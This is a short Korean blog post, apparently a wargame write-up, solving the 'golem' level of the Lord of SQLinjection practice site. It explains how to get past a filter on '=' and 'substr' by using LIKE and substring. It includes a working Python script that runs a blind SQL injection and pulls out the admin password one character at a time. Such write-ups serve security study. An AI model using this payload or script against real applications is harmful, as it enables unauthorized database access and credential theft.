카테고리 없음
Lord of SQLinjection - golem
Janger
2021. 12. 7. 20:00
728x90
이번에도 orge 문제처럼 쿼리문을 두 번 실행시키는 것을 보니, 블라인드 인젝션을 시도해야 하는 문제라는 것을 알게 됐다.
근데 이전 문제와 다르게 "="와 substr을 사용하지 못하도록 필터링을 거치게 된다.
하지만 위를 대체할 표현식들이 이미 존재한다.
"="는 "LIKE"로 바꾸고
"substr"은 "substring"으로 바꿔주면 끝이다.
아래는 자동화 도구이다.
orge에서 사용하던거를 "="를 "LIKE"로 변경하고, "substr"을 "substring"으로 변경해준 것 밖에 없다.
import requests
parameter = None
cookie = {'PHPSESSID':'여기다 자신의 쿠키 값을 입력'}
result = None
solve = ""
for i in range(1, 8+1):
for ascii in range(48, 112+1):
print(ascii)
parameter = "?pw='|| id LIKE 'admin'%26%26 ascii(substring(pw,{},1)) LIKE {}%23".format(i, ascii)
url = "https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php" + parameter
result = requests.get(url=url, cookies=cookie).text
if "Hello admin" in result:
print(i, ascii, chr(ascii))
solve += chr(ascii)
break
print( solve )
참고:
https://janger.tistory.com/120?category=1240702
Lord of SQLinjection - orge 파이썬3 자동화 도구
https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php los.rubiya.kr import requests parameter = None cookie = {'..
janger.tistory.com
728x90